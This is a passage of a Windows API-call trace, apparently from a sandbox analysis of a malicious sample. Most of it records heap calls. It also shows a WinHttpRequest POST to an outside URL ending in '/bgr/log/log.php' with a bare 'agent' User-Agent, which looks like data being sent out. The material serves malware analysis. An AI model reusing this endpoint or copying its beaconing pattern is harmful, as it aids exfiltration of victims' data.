hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1b318 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0f0 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0c0 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0a8 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc050e0 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e4d8 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa138 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa120 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0d8 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219b8 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e500 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa060 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21998 | out: hHeap=0xbe0000) returned 1 [0247.903] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa060 [0247.903] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0d8 [0247.903] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21998 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa108 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21998 | out: hHeap=0xbe0000) returned 1 [0247.903] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa108 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f88 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f70 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9fa0 | out: hHeap=0xbe0000) returned 1 [0247.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9fd0 | out: hHeap=0xbe0000) returned 1 [0247.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9fb8 | out: hHeap=0xbe0000) returned 1 [0247.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9fe8 | out: hHeap=0xbe0000) returned 1 [0247.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa000 | out: hHeap=0xbe0000) returned 1 [0247.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa018 | out: hHeap=0xbe0000) returned 1 [0247.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa030 | out: hHeap=0xbe0000) returned 1 [0247.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0247.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e488 | out: hHeap=0xbe0000) returned 1 [0247.904] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0247.904] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21998 [0247.904] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xd010d0 [0247.904] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xa) returned 0xcfa030 [0247.904] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc26c30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8befb8*="Open", cNames=0x1, lcid=0x800, rgDispId=0x8bf0bc | out: rgDispId=0x8bf0bc*=1) returned 0x0 [0247.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa030 | out: hHeap=0xbe0000) returned 1 [0247.904] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xc26c30, iTInfo=0x0, lcid=0x800, ppTInfo=0x8befb0 | out: ppTInfo=0x8befb0*=0xe15994) returned 0x0 [0247.914] ITypeInfo:RemoteGetTypeAttr (in: This=0xe15994, ppTypeAttr=0x8befa8, pDummy=0x356310 | out: ppTypeAttr=0x8befa8, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.914] ITypeInfo:LocalGetIDsOfNames (This=0xe15994) returned 0x0 [0247.914] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x0, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.917] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc405c8 [0247.917] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x1, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.917] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc1b318 [0247.917] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x2, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.917] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc1b318 [0247.918] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x3, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.918] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc405c8 [0247.918] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x4, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.918] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc405c8 [0247.918] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x5, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.918] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xde3338 [0247.918] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x6, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.918] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.918] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x7, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.918] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc405c8 [0247.918] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x8, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.918] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc405c8 [0247.918] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x9, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.918] ITypeInfo:LocalReleaseTypeAttr (This=0xe15994) returned 0xdc6698 [0247.918] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc405c8 [0247.918] WinHttpRequest:IUnknown:Release (This=0xe15994) returned 0x1 [0247.918] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x44) returned 0xe117d8 [0247.919] WinHttpRequest:IDispatch:Invoke (in: This=0xc26c30, dispIdMember=1, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x8bf0a0*(rgvarg=([0]=0xe117dc*(varType=0xb, wReserved1=0x0, wReserved2=0x5cc, wReserved3=0xc4, varVal1=0x0, varVal2=0x0), [1]=0xe117ec*(varType=0x8, wReserved1=0xdf, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xe117fc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8bf068, puArgErr=0x8bf0b0 | out: pDispParams=0x8bf0a0*(rgvarg=([0]=0xe117dc*(varType=0xb, wReserved1=0x0, wReserved2=0x5cc, wReserved3=0xc4, varVal1=0x0, varVal2=0x0), [1]=0xe117ec*(varType=0x8, wReserved1=0xdf, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xe117fc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8bf068*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8bf0b0*=0x2b5995) returned 0x0 [0247.922] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd010d0 | out: hHeap=0xbe0000) returned 1 [0247.922] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0c0 [0247.922] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0f0 [0247.922] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a68 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe117d8 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21998 | out: hHeap=0xbe0000) returned 1 [0247.923] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0c0 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f28 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219a8 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa090 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa078 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdba810 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a08 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0d8 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa060 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa108 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e4b0 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218c8 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0f0 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a68 | out: hHeap=0xbe0000) returned 1 [0247.923] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0247.923] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0247.923] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21a68 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc218c8 [0247.924] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe57758 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e4b0 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa048 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0f0 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa108 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa060 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0d8 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa078 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21a08 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa090 [0247.924] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a08 | out: hHeap=0xbe0000) returned 1 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02f80 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f28 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0c0 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21a08 [0247.924] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa090 | out: hHeap=0xbe0000) returned 1 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa090 [0247.924] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a08 | out: hHeap=0xbe0000) returned 1 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfaa08 [0247.924] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa150 [0247.925] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa090 | out: hHeap=0xbe0000) returned 1 [0247.925] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0f0 | out: hHeap=0xbe0000) returned 1 [0247.925] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0247.925] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa108 | out: hHeap=0xbe0000) returned 1 [0247.925] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0d8 | out: hHeap=0xbe0000) returned 1 [0247.925] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa060 | out: hHeap=0xbe0000) returned 1 [0247.925] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa078 | out: hHeap=0xbe0000) returned 1 [0247.925] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e4b0 | out: hHeap=0xbe0000) returned 1 [0247.925] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa078 [0247.925] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a08 [0247.925] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xd010d0 [0247.925] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x22) returned 0xe08958 [0247.925] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc26c30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8befb8*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x8bf0bc | out: rgDispId=0x8bf0bc*=2) returned 0x0 [0247.925] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe08958 | out: hHeap=0xbe0000) returned 1 [0247.925] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xc26c30, iTInfo=0x0, lcid=0x800, ppTInfo=0x8befb0 | out: ppTInfo=0x8befb0*=0xe15994) returned 0x0 [0247.925] ITypeInfo:RemoteGetTypeAttr (in: This=0xe15994, ppTypeAttr=0x8befa8, pDummy=0x356310 | out: ppTypeAttr=0x8befa8, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.925] ITypeInfo:LocalGetIDsOfNames (This=0xe15994) returned 0x0 [0247.925] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x0, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.925] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xde3338 [0247.926] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x1, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.926] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc1b318 [0247.926] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x2, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.926] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xc1b318 [0247.926] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x3, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.926] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xde3338 [0247.926] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x4, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.926] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xde3338 [0247.926] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x5, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.926] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xde3338 [0247.926] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x6, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.926] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.926] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x7, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.926] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xde3338 [0247.926] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x8, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.926] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xde3338 [0247.926] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x9, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.926] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xde3338 [0247.926] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0xa, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.926] ITypeInfo:LocalReleaseTypeAttr (This=0xe15994) returned 0xdc6698 [0247.926] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xde3338 [0247.926] WinHttpRequest:IUnknown:Release (This=0xe15994) returned 0x1 [0247.926] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x34) returned 0xe33e10 [0247.927] WinHttpRequest:IDispatch:Invoke (in: This=0xc26c30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x8bf0a0*(rgvarg=([0]=0xe33e14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xe33e24*(varType=0x8, wReserved1=0x0, wReserved2=0xd71a, wReserved3=0x317c, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8bf068, puArgErr=0x8bf0b0 | out: pDispParams=0x8bf0a0*(rgvarg=([0]=0xe33e14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xe33e24*(varType=0x8, wReserved1=0x0, wReserved2=0xd71a, wReserved3=0x317c, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8bf068*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8bf0b0*=0x2b5995) returned 0x0 [0247.927] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd010d0 | out: hHeap=0xbe0000) returned 1 [0247.927] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0247.927] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0f0 [0247.927] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21998 [0247.927] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33e10 | out: hHeap=0xbe0000) returned 1 [0247.927] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa078 | out: hHeap=0xbe0000) returned 1 [0247.927] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a08 | out: hHeap=0xbe0000) returned 1 [0247.927] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa078 [0247.927] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0247.927] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe57758 | out: hHeap=0xbe0000) returned 1 [0247.927] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218c8 | out: hHeap=0xbe0000) returned 1 [0247.927] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0c0 | out: hHeap=0xbe0000) returned 1 [0247.928] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f28 | out: hHeap=0xbe0000) returned 1 [0247.928] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa150 | out: hHeap=0xbe0000) returned 1 [0247.928] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfaa08 | out: hHeap=0xbe0000) returned 1 [0247.928] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe02f80 | out: hHeap=0xbe0000) returned 1 [0247.928] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a68 | out: hHeap=0xbe0000) returned 1 [0247.928] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0f0 | out: hHeap=0xbe0000) returned 1 [0247.928] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21998 | out: hHeap=0xbe0000) returned 1 [0247.928] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa078 | out: hHeap=0xbe0000) returned 1 [0247.928] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21998 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa078 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a68 [0247.928] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa078 | out: hHeap=0xbe0000) returned 1 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe57758 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02f80 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa078 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0f0 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfaa08 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa150 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f28 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa0c0 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218c8 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0247.928] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218c8 | out: hHeap=0xbe0000) returned 1 [0247.928] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02fa8 [0247.929] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa090 [0247.929] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa180 [0247.929] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218c8 [0247.929] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0247.929] RtlAllocateHeap 